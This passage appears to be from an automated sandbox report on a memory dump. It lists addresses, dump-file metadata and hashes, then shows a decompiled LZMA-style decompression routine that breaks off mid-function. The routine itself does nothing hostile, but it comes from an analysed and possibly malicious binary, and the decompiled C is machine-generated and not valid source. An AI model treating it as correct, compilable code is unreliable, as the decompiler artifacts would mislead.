                0x004066cc
                0x004066a0
                0x004066a0
                0x004066a0
                0x004066a0
                0x00000000
                0x004066ce
                0x00000000
                0x004066ce
                0x004066cc
                0x00406652
                0x00406655
                0x00406657
                0x0040665a
                0x00000000
                0x00000000
                0x004063b9
                0x004063b9
                0x004063bd
                0x00406a02
                0x00000000
                0x00406a02
                0x004063c3
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d2
                0x004063d5
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e2
                0x004063e2
                0x004063e2
                0x00000000
                0x00000000
                0x00406544
                0x00406544
                0x00406548
                0x00406a0e
                0x00000000
                0x00406a0e
                0x0040654e
                0x00406551
                0x00406554
                0x00406557
                0x00406559
                0x00406559
                0x00406559
                0x0040655c
                0x0040655f
                0x00406562
                0x00406565
                0x00406568
                0x0040656b
                0x0040656c
                0x0040656e
                0x0040656e
                0x0040656e
                0x00406571
                0x00406574
                0x00406577
                0x0040657a
                0x0040657a
                0x0040657a
                0x0040657d
                0x0040657f
                0x0040657f
                0x00000000
                0x00000000
                0x004067c1
                0x004067c1
                0x004067c1
                0x004067c5
                0x00000000
                0x00000000
                0x004067cb
                0x004067ce
                0x004067d1
                0x004067d4
                0x004067d6
                0x004067d6
                0x004067d6
                0x004067d9
                0x004067dc
                0x004067df
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e9
                0x004067eb
                0x004067eb
                0x004067eb
                0x004067ee
                0x004067f1
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fe
                0x00406800
                0x00406803
                0x00000000
                0x00406805
                0x00406582
                0x00406582
                0x00000000
                0x00406582
                0x00406803
                0x00406a38
                0x00406a5a
                0x00406a60
                0x00406a62
                0x00406a69
                0x00000000
                0x00000000
                0x00406067
                0x00406a6f
                0x00406a6f
                0x00000000

                Memory Dump Source
                • Source File: 00000008.00000002.289929586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000008.00000002.289868632.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.289964819.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290014852.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290078414.0000000000417000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290084814.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290095675.000000000042A000.00000004.00020000.sdmp Download File
                • Associated: 00000008.00000002.290154899.000000000042D000.00000002.00020000.sdmp Download File
                • Associated: 00000008.00000002.290281669.000000000043D000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                • Instruction ID: b8f14fa8ad5cea51b2b9a2e46606c418b7244df3771cf842608f3b99def8c173
                • Opcode Fuzzy Hash: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                • Instruction Fuzzy Hash: A3818731E00228CFDF24DFA8C8447ADBBB1FB45305F21816AD956BB281C7785A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406473, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E00406473() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406A77))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
